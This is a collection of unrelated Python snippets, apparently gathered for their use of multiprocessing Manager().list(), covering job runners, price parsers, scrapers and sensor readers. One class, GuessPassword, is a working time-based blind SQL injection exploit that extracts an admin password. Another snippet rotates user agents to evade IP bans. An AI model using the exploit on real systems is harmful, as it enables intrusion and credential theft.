def run(self, job_name): """ This method is used to create a job, validate it and run it on remote nodes :param job_name: name of the job to create :return: """ job_metadata = self.batch_config.get('job-metadata')[job_name] all_job_ids = Manager().list() cluster_name = job_metadata['slurm_cluster_name'] slurm_cluster = self.batch_config.get('slurm_cluster').get(cluster_name) path = path_expand(slurm_cluster['credentials']['sshconfigpath']) ssh_caller = lambda *x: self._ssh(slurm_cluster['name'], path, *x) scp_caller = lambda *x: self._scp(slurm_cluster['name'], path, *x) # TODO replace with .format ssh_caller('cd %s && mkdir job%s' % (job_metadata['raw_remote_path'], job_metadata['suffix']), True) scp_caller(job_metadata['slurm_script_path'], '%s:%s' % (slurm_cluster['name'], job_metadata['remote_slurm_script_path'])) scp_caller(job_metadata['job_script_path'], '%s:%s' % (slurm_cluster['name'], job_metadata['remote_script_path'])) ssh_caller('chmod +x', job_metadata['remote_script_path']) if job_metadata['input_type'].lower() == 'params+file': scp_caller(job_metadata['argfile_path'], '%s:%s' % (slurm_cluster['name'], job_metadata['remote_path'])) remote_job_id = ssh_caller("cd %s && qsub %s && qstat -u $USER | tail -n 1 | awk '{print $1}'" % (job_metadata['remote_path'], job_metadata['remote_slurm_script_path'])) remote_job_id = remote_job_id.strip('\n') all_job_ids.append(remote_job_id) print('Remote job ID: %s' % remote_job_id) self.batch_config.deep_set(['job-metadata', job_name, 'jobIDs'], [pid for pid in all_job_ids])
class Family(object): def __init__( self, last_name, synchronized_approach=SynchronizedListImplementation.THREAD_LOCK): print('Create a new family object') self._last_name = last_name self.synchronized_approach = synchronized_approach if self.synchronized_approach == SynchronizedListImplementation.MULTIPROCESSING_MANAGER: self._members = Manager().list() else: self._members = [] self._lock = threading.Lock() self._cnt = 0 def Add(self, first_name): # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK: # self._lock.acquire() name = Name(first_name, self._last_name) if name not in self._members: self._members.append(name) # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK: # self._lock.release() @property def last_name(self): return self._last_name @last_name.setter def last_name(self, value): self._last_name = value def __str__(self): return '%s Family:\n%s' % (self._last_name, '\n'.join( [str(name) for name in self._members]))
class ParserBithumb: def __init__(self, conf: dict): self.url = conf['url'] self.currency = conf['currency'] self.table = 'crypto' self.items = Manager().list() def parse(self, curr: str): response = requests.get(self.url + curr) result = response.json()["data"] item = dict( exchange="bithumb", name=curr.lower(), price=int(result["closing_price"]), volume=round(float(result["units_traded"])), date=convert_timestamp_mills(result['date']) ) self.items.append(item) def get_items(self) -> List[dict]: procs = [] for _index, curr in enumerate(self.currency): proc = Process(target=self.parse, args=(curr,)) procs.append(proc) proc.start() for proc in procs: proc.join() return self.items
class MemStorage: def __init__(self, config): self.config = config self.measures = Manager().list() def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): pass def save(self, measure): self.measures.append(measure) def last(self): if len(self.measures) <= 0: return None return self.measures[-1] def __str__(self): buf = "<{} measures: [".format(self.__class__) for item in self.measures: buf += "'{}'".format(item) buf += "]>" return buf
def train(target, workers, title): parents, childs = zip(*[Pipe() for _ in range(2)]) population = Manager().list() population.append(workers[0]) population.append(workers[1]) processes = [] for i in range(0, 2): processes.append( Process(target=target, args=(i, population, childs[i]))) # Start the process’s activity. for process in processes: process.start() params_x = [] params_y = [] for i in range(0, 2): params_store = parents[i].recv() params_x.append([params[0] for params in params_store]) params_y.append([params[1] for params in params_store]) plot(params_x, params_y, title) # Block the calling thread until the process whose join() method is called terminates for process in processes: process.join() print(population[0].performance) print(population[1].performance)
class ParserKorbit: def __init__(self, conf: dict): self.url = conf['url'] self.currency = conf['currency'] self.table = 'crypto' self.items = Manager().list() def parse(self, curr: str): params = {"currency_pair": curr} response = requests.get(self.url, params) result = response.json() item = dict(exchange="korbit", name=curr.replace("_krw", ""), price=int(result["last"]), volume=round(float(result["volume"])), date=convert_timestamp_mills(result['timestamp'])) self.items.append(item) def get_items(self) -> List[dict]: procs = [] for _index, curr in enumerate(self.currency): proc = Process(target=self.parse, args=(curr, )) procs.append(proc) proc.start() for proc in procs: proc.join() return self.items
def sampleWithDistInfo_boundStrat_multiThread(self, num): """Randomly sample one configuration in the c-space first. (Get a sphere) Then add the sphere to result set. repeat: sample the boundary of spheres set. add new sphere to the set until @param num: Total number of spheres as a terminate condition. ###################### TODO: find a terminate condition that can be used to evaluate sphere coverage """ try: #self.mDistSamples = Manager().list(); self.g_failTimes.value = 0; boundaryQueue = multiprocessing.Queue(); dictProxy = Manager().list() dictProxy.append({}); threads = []; threadsCount = 1; for i in range(0,threadsCount): newThread = Process( target=self.__mltithreadDistSample_boundStrat__, args=[ i, dictProxy, boundaryQueue,num ] ); threads += [newThread]; for i in range( 0,threadsCount ): threads[i].start(); for i in range( 0,threadsCount ): threads[i].join(); print "Get {0} samples".format( len(self.mDistSamples) ); except Exception, msg: print "Failed to start a thread, MSG:\n\t" + str(msg); self.g_failTimes.value = 0;
def run_everything(): setting = get_project_settings() # process = CrawlerProcess(setting) alreadyUsedWord = Manager().list() notYetUsedWord = Manager().list() roundCount = 0 # get json, input the search value from flask to here. search_field = sys.argv[1] engine = db_connect() Session = sessionmaker(bind=engine) session = Session() initialNewsCount = 0 duplicateCountBeforeBreak = 0 while True: alreadyUsedWord.append(search_field) run_spider('thai_spider', setting, search_field, alreadyUsedWord, notYetUsedWord) session.commit() newsCount = session.query(func.count(News.id)).scalar() print('total news in db is' + str(newsCount)) roundCount += 1 if newsCount - initialNewsCount < 3: print("Too low news now let's stop") duplicateCountBeforeBreak += 1 if duplicateCountBeforeBreak >= 2: break else: initialNewsCount = newsCount duplicateCountBeforeBreak = 0 if len(notYetUsedWord) == 0: break search_field = notYetUsedWord.pop()
def train(plasfile, chromfile, outdir, num_procs, ks=[3, 4, 5, 6, 7], lens=[1000, 10000, 100000, 500000]): ''' Train PlasClass models ''' print("Starting PlasClass training") print("Getting reference lengths") chrom_names, chrom_lengths = get_seq_lengths(chromfile) plas_names, plas_lengths = get_seq_lengths(plasfile) for l in lens: coverage = 5 # TODO: make this command line option num_frags = get_num_frags(plas_lengths, l, coverage) print("Sampling {} fragments for length {}".format(num_frags, l)) plas_start_inds = get_start_inds(plas_names, plas_lengths, num_frags, l) chrom_start_inds = get_start_inds(chrom_names, chrom_lengths, num_frags, l) plas_seqs = get_seqs(plasfile, plas_start_inds, l) chrom_seqs = get_seqs(chromfile, chrom_start_inds, l) print("Getting k-mer frequencies") kmer_inds, kmer_count_lens = utils.compute_kmer_inds(ks) pool = mp.Pool(num_procs) plas_list = Manager().list() for cur in np.arange(len(plas_seqs)): plas_list.append(0) pool.map(utils.count_kmers, [[ind,s, ks, kmer_inds, kmer_count_lens, plas_list] \ for ind,s in enumerate(plas_seqs)]) plas_freqs = np.array(plas_list) chrom_list = Manager().list() for cur in np.arange(len(chrom_seqs)): chrom_list.append(0) pool.map(utils.count_kmers, [[ind, s, ks, kmer_inds, kmer_count_lens, chrom_list] \ for ind,s in enumerate(chrom_seqs)]) chrom_freqs = np.array(chrom_list) pool.close() print("Learning classifier") plas_labels = np.ones(plas_freqs.shape[0]) chrom_labels = np.zeros(chrom_freqs.shape[0]) data = np.concatenate((plas_freqs, chrom_freqs)) labels = np.concatenate((plas_labels, chrom_labels)) scaler = StandardScaler().fit(data) scaled = scaler.transform(data) clf = LogisticRegression(solver='liblinear').fit(scaled, labels) print("Saving classifier") clf_name = 'm' + str(l) scaler_name = 's' + str(l) dump(clf, os.path.join(outdir, clf_name)) dump(scaler, os.path.join(outdir, scaler_name))
class Painter(): def __init__(self, repr=[ 'Ax', 'Ay', 'Az', 'Gx', 'Gy', 'Gz', 'Mx', 'My', 'Mz', 'Q1', 'Q2', 'Q3', 'Q4', 'Y', 'P', 'R' ], display=None, memorySize=10, ylim=[-200, 200]): self.n = len(repr) self.repr = repr if display is None: self.display = list(range(self.n)) else: self.display = display self.memorySize = memorySize if isinstance(ylim, numbers.Number): self.ylim = (-ylim, ylim) else: self.ylim = ylim self.data = Manager().list( [np.zeros(self.n) for i in range(self.memorySize)]) self.process = None self.animation = None self.line = [None for i in range(self.n)] def __call__(self, data): self.data.append(data) def plot(self): self.process = mp.Process(target=self._plot) self.process.start() def _plot(self): fig = plt.figure() self.animation = animation.FuncAnimation(fig=fig, func=self._update, init_func=self._init, interval=20, blit=False) plt.show() def save(self, path): self.animation.save(path, fps=30, extra_args=['-vcodec', 'libx264']) def _init(self): data = np.array(self.data)[-self.memorySize:] for i in self.display: self.line[i] = plt.plot(data[:, i], label=self.repr[i])[0] plt.xlim((0, self.memorySize)) plt.ylim(self.ylim) plt.legend(loc='upper right') def _update(self, index): data = np.array(self.data)[-self.memorySize:] for i in self.display: self.line[i].set_ydata(data[:, i])
class Result: def __init__(self, urls_detail: dict, finished_urls: list, failed_urls: list, config: Config, start_time, initial_time, end_time): self.urls_detail = Manager().dict() self.urls_detail.update(urls_detail) self.finished_urls = Manager().list() self.finished_urls.extend(finished_urls) self.failed_urls = Manager().list() self.failed_urls.extend(failed_urls) self.config = copy.deepcopy(config) self.start_time = start_time self.initial_time = initial_time self.end_time = end_time def get_failed_urls(self): return self.failed_urls def get_finished_urls(self): return self.finished_urls def get_urls_detail_dict(self): return self.urls_detail def retry_failed_urls(self, *new_config: Config): if len(self.failed_urls) == 0: print("no failed urls") return True config = copy.deepcopy(new_config[0] if len(new_config) == 1 else self.config) if len(new_config) == 1: config.list_config() retry_downloader = Downloader(config) result = retry_downloader.get_result(self.failed_urls) self.failed_urls = result.failed_urls for url in result.finished_urls: self.finished_urls.append(url) self.urls_detail.update(result.urls_detail) return True def show_time_cost(self): time_cost = '\n'.join([ 'initialize download tasks cost: {:.2f}s'.format( self.initial_time - self.start_time), 'finish download task cost: {:.2f}s'.format(self.end_time - self.initial_time), 'total cost: {:.2f}s'.format(self.end_time - self.start_time) ]) print(time_cost) def show_urls_status(self): urls_status = '|'.join([ 'finished: ' + str(len(self.finished_urls)), 'failed: ' + str(len(self.failed_urls)), 'total: ' + str(len(self.finished_urls) + len(self.failed_urls)) ]) print(urls_status)
class GuessPassword(object): def __init__(self, passwd_length, processes=6, timeout=3): self.result = Manager().dict() self.stop_flag = Manager().list() self.worker_list = [] self.processes = processes self.timeout = timeout self.queue = Queue() self.lock = RLock() self.cookie = {'_SERVER': ''} self.passwd_length = passwd_length self.url = "http://localhost/general/document/index.php/send/approve/finish" self.payload = "1) and char(@`'`) union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)" self.stop_flag.append(False) # 这里不能写成 self.stop_flag[0] = False, 否则会提示 indexOutRange for _ in range(1, self.passwd_length): self.queue.put(_) def exploit(self): while not self.queue.empty() and not self.stop_flag[0]: passwd_position = self.queue.get() for _guess_char in range(33, 128): payload = self.payload.format(position=passwd_position, guess_char=_guess_char) exp_data = {'sid': payload} try: res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout) except requests.ReadTimeout: self.lock.acquire() self.result[passwd_position] = chr(_guess_char) print "Data %dth: %s" % (passwd_position, self.result[passwd_position]) self.lock.release() break def run(self): for _ in range(self.processes): _worker = Process(target=self.exploit) # _worker.daemon = True _worker.start() try: while len( multiprocessing.active_children()) > 2: # 为什么不是大于0呢, 当所有工作子进程都结束之后,还有两个子进程在运行,那就是两个Manager 子进程(用于多进程共享数据);multiprocessing.active_children() 返回的是当前活动进程对象的list # self.lock.acquire() # print len(multiprocessing.active_children()) # self.lock.release() time.sleep(1) except KeyboardInterrupt: self.lock.acquire() print 'wait for all subprocess stop......' self.stop_flag[0] = True self.lock.release() else: print self.result print 'finish'
def _get_ruuvitag_datas(macs=[], search_duratio_sec=None, run_flag=RunFlag(), bt_device=''): """ Get data from BluetoothCommunication and handle data encoding. Args: macs (list): MAC addresses. Default empty list search_duratio_sec (int): Search duration in seconds. Default None run_flag (object): RunFlag object. Function executes while run_flag.running. Default new RunFlag bt_device (string): Bluetooth device id Yields: tuple: MAC and State of RuuviTag sensor data """ mac_blacklist = Manager().list() start_time = time.time() data_iter = ble.get_datas(mac_blacklist, bt_device) for ble_data in data_iter: # Check duration if search_duratio_sec and time.time( ) - start_time > search_duratio_sec: data_iter.send(StopIteration) break # Check running flag if not run_flag.running: data_iter.send(StopIteration) break # Check MAC whitelist if advertised MAC available if ble_data[0] and macs and not ble_data[0].upper() in map( str.upper, macs): continue (data_format, data) = DataFormats.convert_data(ble_data[1]) # Check that encoded data is valid RuuviTag data and it is sensor data # If data is not valid RuuviTag data add MAC to blacklist if MAC is available if data is not None: decoded = get_decoder(data_format).decode_data(data) if decoded is not None: # If advertised MAC is missing, try to parse it from the payload mac = ble_data[0] if ble_data[0] else \ parse_mac(data_format, decoded['mac']) if decoded['mac'] else None # Check whitelist using MAC from decoded data if advertised MAC is not available if mac and macs and mac.upper() not in map( str.upper, macs): continue yield (mac, decoded) else: log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0], ble_data[1]) else: if ble_data[0]: mac_blacklist.append(ble_data[0])
def generate_permuted_matrices(file_name, n_start, n_end, p_factor, sa_factor, use_cache): mat = pd.read_csv(os.path.join(constants.DATASETS_FOLDER, "{}.tsv".format(file_name)), sep='\t', index_col=0) p = Pool(p_factor) arr=Manager().list([]) params = [] mat[pd.isna(mat)] = 0 # MODIFY THIS LINE for a in np.arange(n_start,n_end): if use_cache and os.path.exists(os.path.join(constants.CACHE_FOLDER, file_name, "{}_perm_{}.tsv".format(file_name, a))): arr.append(1) else: params.append([mat, file_name, sa_factor, a, arr]) print "permuting {}/{} matrices ({} exist in cache)".format(n_end-n_start-len(arr), n_end-n_start, len(arr)) p.map(permute_matrix, params)
def run(dir_name, device_mac, script_dir, previous_info, num_proc): global filenames print(" Reading the destination info...") read_dst_csv(result=previous_info) print(" Reading common protocol and port info...") read_protocol_csv(script_dir + "/protocol_analysis/protocols_info.csv") print(" Analyzing the protocol and port of each packet...") results = Manager().list() for i in range(num_proc): filenames.append([]) results.append([]) index = 0 for root, dirs, files in os.walk(dir_name): for filename in files: if filename.endswith(".pcap") and not filename.startswith("."): filenames[index].append(root + "/" + filename) index += 1 if index >= num_proc: index = 0 procs = [] pid = 0 for i in range(num_proc): p = Process(target=dst_protocol_analysis, args=(pid, device_mac, results)) procs.append(p) p.start() pid += 1 for p in procs: p.join() combined_results = results[0] for i in range(num_proc - 1): dst_pro_arr = results[i + 1] for dst_pro in dst_pro_arr: if dst_pro in combined_results: index = combined_results.index(dst_pro) combined_results[index].add_all(dst_pro.snd, dst_pro.rcv, dst_pro.p_snd, dst_pro.p_rcv) else: combined_results.append(dst_pro) return combined_results
def cluster_to_hotspot(self, texts_list, top_k, kw_num, text_sim_threshold, topic_sim_threshold) -> List[Hotspot]: texts_list = split_list(texts_list, self.process_num) model_list = [ TextClusterModel(texts=texts_list[i], vec_model=self.w2v_model, kw_num=kw_num, sim_threshold=text_sim_threshold) for i in range(self.process_num) ] shared_res_list = Manager().list([]) p_list = [ Process(target=m.cluster_to, args=(shared_res_list, )) for m in model_list ] [p.start() for p in p_list] [p.join() for p in p_list] # 3. hotspot cluster logger.info('{} processes finished, shared_res_list length:{}'.format( self.process_num, len(shared_res_list))) while len(shared_res_list) > 1: model_list = [] p_list = [] single_hotspots = None for i in range(0, len(shared_res_list), 2): try: model_list.append( HotspotClusterModel( hotspots_1=shared_res_list[i], hotspots_2=shared_res_list[i + 1], sim_threshold=topic_sim_threshold, )) except Exception as e: single_hotspots = shared_res_list[-1] shared_res_list = Manager().list([]) if single_hotspots is not None: shared_res_list.append(single_hotspots) for model in model_list: p_list.append( Process(target=model.cluster_to, args=(shared_res_list, ))) [p.start() for p in p_list] [p.join() for p in p_list] logger.info('Shared_res_list length:{}'.format( self.process_num, len(shared_res_list))) logger.info('Shared_res_list length:{}'.format(self.process_num, len(shared_res_list))) return sorted(shared_res_list[0], key=lambda x: x.ranks, reverse=True)[:top_k]
def LDA_topic_modeller_by_quarter_by_brand_multiprocessing( DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS, number_of_topics_range): #Read in processed documents from cache, or process new document if os.path.isfile('pickle_files/{}.pickle'.format( 'processed_data_by_quarter')) and os.path.isfile( 'pickle_files/{}.pickle'.format( 'processed_data_by_quarter_by_brand')): with open( 'pickle_files/{}.pickle'.format( 'processed_data_by_quarter_by_brand'), 'rb') as handle_2: dict_of_clean_doc_by_quarter_by_brand = pickle.load(handle_2) else: _, dict_of_clean_doc_by_quarter_by_brand = Preprocessing( DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS) #Generate list of quarters DF['Date'] = pd.to_datetime(DF['Date'], infer_datetime_format=True) DF['Y-Quarter'] = DF['Date'].dt.to_period("Q") list_of_quarters = DF['Y-Quarter'].unique() #Limit quarters to those in 2016, 2017, 2018 list_of_years_to_include = ['2016', '2017', '2018'] list_of_quarters = [ quarter for quarter in list_of_quarters if any(year in str(quarter) for year in list_of_years_to_include) ] combination_of_brands = [] for quarter in list_of_quarters: combination_of_brands += list( itertools.product( [str(quarter)], dict_of_clean_doc_by_quarter_by_brand[str(quarter)].keys())) from multiprocessing import Pool, cpu_count, Manager print("{} products found... ".format(str(len(combination_of_brands)))) list_of_arguments = [(dict_of_clean_doc_by_quarter_by_brand, str(quarter_brand[0]), quarter_brand[1], number_of_topics_range) for quarter_brand in combination_of_brands] output_df = Manager().list() with Pool(processes=cpu_count() * 2) as pool: review_df = pool.starmap(build_single_LDA_model, list_of_arguments) output_df = output_df.append(review_df) pool.terminate() pool.join() output_df = pd.concat(output_df, ignore_index=True) writer = pd.ExcelWriter( 'topic model results/LDA Topic Model by Quarter by Brand.xlsx') output_df.to_excel(writer, 'Topic Model by Quarter by Brand') writer.save() writer.close() return
class thread(threading.Thread): def __init__(self, c0): threading.Thread.__init__(self) self.flag = True self.l = Manager().list() self.l.append(0) self.l.append(1) self.l.append('ss') self.c0 = c0 #salva o final do cano def run(self): self.p = Process(target=f, args=( self.l, self.c0, )) #inicia um processo em loop com o cano -vai pra linha 5 self.p.start() self.p.join()
class Storage(object): def __init__(self, maxsize, storage_batchs, num_speakers_in_batch, num_threads=8): # use multiprocessing for threading safe self.storage = Manager().list() self.maxsize = maxsize self.num_speakers_in_batch = num_speakers_in_batch self.num_threads = num_threads self.ignore_last_batch = False if storage_batchs >= 3: self.ignore_last_batch = True # used for fast random sample self.safe_storage_size = self.maxsize - self.num_threads if self.ignore_last_batch: self.safe_storage_size -= self.num_speakers_in_batch def __len__(self): return len(self.storage) def full(self): return len(self.storage) >= self.maxsize def append(self, item): # if storage is full, remove an item if self.full(): self.storage.pop(0) self.storage.append(item) def get_random_sample(self): # safe storage size considering all threads remove one item from storage in same time storage_size = len(self.storage) - self.num_threads if self.ignore_last_batch: storage_size -= self.num_speakers_in_batch return self.storage[random.randint(0, storage_size)] def get_random_sample_fast(self): """Call this method only when storage is full""" return self.storage[random.randint(0, self.safe_storage_size)]
def run(): # make sure no old procs left running os.system('taskkill /F /IM plugin-container.exe') os.system('taskkill /F /IM firefox.exe') os.system('taskkill /F /IM geckodriver.exe') os.system('taskkill /F /IM helper.exe') bot_creds_list = [] # bot credentials, format: 'login:password:port' with open('creds_list.txt', 'r') as infile: for line in infile: line = line.strip() if line: bot_creds_list.append(line) # launch redis cache server run_redis_srv() # populate companies list from file companies_list = Manager().list() with open('companies_list_filtered.txt') as infile: for cid in infile: cid = cid.strip() if cid: companies_list.append(cid) proc_list = [] # set to limit max bots from creds_list[] limit = len(bot_creds_list) for bot_creds in bot_creds_list[0:limit]: worker_proc = Process(target=worker, args=( companies_list, bot_creds, )) proc_list.append(worker_proc) for worker_num, worker_proc in enumerate(proc_list): worker_proc.start() print 'started worker: %s' % worker_num time.sleep(random.randint(55, 65)) for worker_num, worker_proc in enumerate(proc_list): worker_proc.join() print 'joined worker: %s' % worker_num
class Scanner(object): def __init__(self): self.task = Manager().list() self.outputer = Outputer() def add_task(self, root_domain, domain, s_type): t = (root_domain, domain, s_type) self.task.append(t) print self.task return def check_network(self, domain): domain = "http://" + domain res, code, error = my_request(domain) if not error: return True else: warning = str(error) print warning return False # def get_ip(self, domain): # import socket # ip = socket.getaddrinfo(domain, 'http')[0][4][0] # return str(ip) def _get_ip(self, domain): retry = 3 ip = None num = 0 api = "http://ip-api.com/json/%s?lang=en" % domain while num != retry: try: res = urllib2.urlopen(api).read() ip = json.loads(res)["query"].encode('utf8') if re.match("\d+\.\d+\.\d+\.\d+", ip): break else: num += 1 except Exception, e: print e #print "[-] Get ip error : Network error" num += 1 return ip
class Analyzer(object): def __init__(self, num_proc, path_to_data): self.num_proc = num_proc self.path_to_data = path_to_data self.global_lst = Manager().list() self.topic_lst = os.listdir(path_to_data) if ((len(self.topic_lst) / num_proc) - (len(self.topic_lst) // num_proc) != 0): self.size_group = (len(os.listdir(path_to_data)) // num_proc) + 1 else: self.size_group = (len(os.listdir(path_to_data)) // num_proc) for i in range(len(self.topic_lst)): self.global_lst.append([10]) def analyzer(self, index_process): for i in range(self.size_group * index_process, self.size_group * (index_process + 1)): buffer_str = "" if i < len(self.topic_lst): filename_lst = os.listdir(self.path_to_data + '/' + self.topic_lst[i]) for text in filename_lst: with open(self.path_to_data + '/' + self.topic_lst[i] + '/' + text, 'r') as file: buffer_str += file.read().lower() words_lst = re.split(r'\W| ', buffer_str) words_lst = list(set(words_lst)) words_lst = list(filter(None, words_lst)) self.global_lst[i] = words_lst def determine_topic(self, filename): buffer_str = "" with open(filename, 'r') as file: buffer_str = file.read().lower() words_lst = re.split(r'\W| ', buffer_str) words_lst = list(set(words_lst)) words_lst = list(filter(None, words_lst)) result_lst = [0 for i in range(len(self.topic_lst))] for index_topic in range(len(self.topic_lst)): result_lst[index_topic] = len(self.global_lst[index_topic]) - \ len(set(self.global_lst[index_topic]) - set(words_lst)) return self.topic_lst[result_lst.index(max(result_lst))] def start_process(self): proc_lst = [Process(target=self.analyzer, args=(i,)) for i in range(self.num_proc)] for i in proc_lst: i.start() for i in proc_lst: i.join()
def _fit(self, input_data: InputData, use_fitted_operations=False, process_state_dict: Manager = None, fitted_operations: Manager = None): """ Run training process in all nodes in pipeline starting with root. :param input_data: data used for operation training :param use_fitted_operations: flag defining whether use saved information about previous executions or not, default True :param process_state_dict: this dictionary is used for saving required pipeline parameters (which were changed inside the process) in a case of operation fit time control (when process created) :param fitted_operations: this list is used for saving fitted operations of pipeline nodes """ # InputData was set directly to the primary nodes if input_data is None: use_fitted_operations = False else: use_fitted_operations = self._fitted_status_if_new_data( new_input_data=input_data, fitted_status=use_fitted_operations) if not use_fitted_operations or not self.fitted_on_data: # Don't use previous information self.unfit() self.update_fitted_on_data(input_data) with Timer(log=self.log) as t: computation_time_update = not use_fitted_operations or not self.root_node.fitted_operation or \ self.computation_time is None train_predicted = self.root_node.fit(input_data=input_data) if computation_time_update: self.computation_time = round(t.minutes_from_start, 3) if process_state_dict is None: return train_predicted else: process_state_dict['train_predicted'] = train_predicted process_state_dict['computation_time'] = self.computation_time process_state_dict['fitted_on_data'] = self.fitted_on_data for node in self.nodes: fitted_operations.append(node.fitted_operation)
class Parallel(object): """ generate samples from some data structure """ def __init__(self, objective, objective_kwargs): self.objective = objective self.objective_kwargs = objective_kwargs return def run(self, iterable_obj, n_jobs=-1): try: iter(iterable_obj) except Exception as e: raise Exception(e.__str__()) self.X = Manager().list() if n_jobs == -1: import multiprocessing n_jobs = multiprocessing.cpu_count() pool = Pool(n_jobs) params = [] for item in iterable_obj: params.append((item, )) pool.starmap(self.worker, params) pool.close() pool.join() return list(self.X) def worker(self, item): try: d_ = self.objective(item, **self.objective_kwargs) if type(d_) == dict: self.X.append(d_) elif type(d_) == list: for d_i_ in d_: self.X.append(d_i_) else: 'objective not return a dict object or a dict list' except Exception as e: raise Exception()
def amazon_scrape_to_df_multithreading(keyword): """ Function: --------- (1) amazon_scrape_to_df_multithreading calls the amazon_df_one_asin, and iterates through all available ASINs, returning a Pandas DataFrame (2) Output DataFrame is also saved as a pickle file, for caching purposes. (3) WITH MULTIPROCESSING Args: ----- (1) keyword (str): Search term defined by the user Returns: -------- output_df (pandas DataFrame): pandas DataFrame with the following columns: (a) Name (b) Rating (c) User Comment (d) Date (e) Brand (f) Usefulness (g) Source """ # Fake User Agent library is used, so that the User Agent is randomized, so as to be able to circumvent IP bans. # It will make the code run slightly slower, but we are able to yield better results. ua = UserAgent(cache=False, verify_ssl=False) list_of_asin = amazon_get_asin(keyword, ua.random) print("{} products found... ".format(str(len(list_of_asin)))) list_of_asin_and_ua = [(asin, ua.random) for asin in list_of_asin] output_df = Manager().list() with Pool(processes=cpu_count() * 2) as pool: review_df = pool.starmap(amazon_df_one_asin, list_of_asin_and_ua) output_df = output_df.append(review_df) pool.terminate() pool.join() output_df = pd.concat(output_df, ignore_index=True) with open('pickle_files/amazon_web_scrape.pickle', 'wb') as handle: pickle.dump(output_df, handle, protocol=pickle.HIGHEST_PROTOCOL) return output_df
def _get_ruuvitag_datas(macs=[], search_duratio_sec=None, run_flag=RunFlag(), bt_device=''): """ Get data from BluetoothCommunication and handle data encoding. Args: macs (list): MAC addresses. Default empty list search_duratio_sec (int): Search duration in seconds. Default None run_flag (object): RunFlag object. Function executes while run_flag.running. Default new RunFlag bt_device (string): Bluetooth device id Yields: tuple: MAC and State of RuuviTag sensor data """ mac_blacklist = Manager().list() start_time = time.time() data_iter = ble.get_datas(mac_blacklist, bt_device) for ble_data in data_iter: # Check duration if search_duratio_sec and time.time() - start_time > search_duratio_sec: data_iter.send(StopIteration) break # Check running flag if not run_flag.running: data_iter.send(StopIteration) break # Check MAC whitelist if macs and not ble_data[0] in macs: continue (data_format, data) = DataFormats.convert_data(ble_data[1]) # Check that encoded data is valid RuuviTag data and it is sensor data # If data is not valid RuuviTag data add MAC to blacklist if data is not None: state = get_decoder(data_format).decode_data(data) if state is not None: yield (ble_data[0], state) else: log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0], ble_data[1]) else: mac_blacklist.append(ble_data[0])
class JobManager(threading.Thread): def __init__(self, num_workers, worker_name): threading.Thread.__init__(self, name=worker_name) self.pool = Pool(num_workers=num_workers, name=worker_name) if os.name == 'nt': self.in_progress_jobs = [] self.lock = threading.RLock() else: self.in_progress_jobs = Manager().list() self.lock = Manager().Lock() def run(self): while 1: try: time.sleep(20) self.dispatch() except Exception: # Print to debug console instead of to DB. import traceback print(traceback.format_exc()) def dispatch(self): raise NotImplementedError("Children must override dispatch()") def submit_job(self, work_unit): with self.lock: if work_unit.get_unique_key() in self.in_progress_jobs: return False self.in_progress_jobs.append(work_unit.get_unique_key()) # Remember these shared memory references work_unit.in_progress_jobs = self.in_progress_jobs work_unit.lock = self.lock self.pool.submit(work_unit) return True
class CallbackModule(object): def __init__(self): self.job_id = os.environ['MY_JOB_ID'] self.result_list = Manager().list() def playbook_on_start(self): pass def runner_on_failed(self, host, res, ignore_errors=False): self.result_list.append({ "host": host, "res": res, "status": "failures" }) def runner_on_ok(self, host, res): self.result_list.append({"host": host, "res": res, "status": "ok"}) def runner_on_skipped(self, host, item=None): self.result_list.append({"host": host, "res": '', "status": "skipped"}) def runner_on_unreachable(self, host, res): self.result_list.append({ "host": host, "res": res, "status": "unreachable" }) def playbook_on_stats(self, stats): """Complete: Flush log to database""" hosts = stats.processed.keys() summary = {} for h in hosts: t = stats.summarize(h) summary[h] = t task_summary = defaultdict(lambda: defaultdict(list)) for task_execute_item in self.result_list: host = task_execute_item["host"] status = task_execute_item["status"] res = task_execute_item["res"] task_summary[host][status].append(res) result = {"summary": summary, "task_summary": task_summary} print json.dumps(result, sort_keys=True, indent=4, separators=(',', ': '))
def run(self): if len(self.__href_d) == 0: return [] pool_size = min(cpu_count() * 4, len(self.__href_d)) result_list = Manager().list() pool = Pool(pool_size) for district in self.__href_d: url = urljoin(self.url, self.__href_d[district]) pool.apply_async(thread, args=(district, url, result_list), error_callback=lambda e: println(e)) pool.close() pool.join() result = self.__city_data result_list.append(result) df = pd.DataFrame(result_list) df.columns = [ "省", "市", "区", "住宅:二手房:价格", "住宅:二手房:环比", '住宅+新楼盘+价格', '住宅+新楼盘+环比', "住宅:出租:价格", "住宅:出租:环比", "商铺:二手房:价格", "商铺:二手房:环比", "商铺:出租:价格", "商铺:出租:环比", "办公:二手房:价格", "办公:二手房:环比", "办公:出租:价格", "办公:出租:环比" ] return result_list
class ParserWorld: def __init__(self, conf: dict): self.url = conf['url'] self.currency = conf['currency'] self.table = 'index' self.items = Manager().list() def parse(self, curr): symbol, name = curr.split() params = {"symbol": symbol} response = requests.get(self.url, params).text bs = BeautifulSoup(response, "html.parser") rows = bs.find('table', id='dayTable').find('tbody') price = rows.find('span').text status = add_status( rows.find('tr').attrs['class'][0], rows.find('span', class_='point_status').text, "point_dn") item = dict(name=name, date=convert_datetime_string(rows.find('td').text), price=price.replace(",", ""), status=status, rate=calculate_ratio(status, price.replace(",", ""))) self.items.append(item) def get_items(self) -> List[dict]: procs = [] for _index, curr in enumerate(self.currency): proc = Process(target=self.parse, args=(curr, )) procs.append(proc) proc.start() for proc in procs: proc.join() return self.items
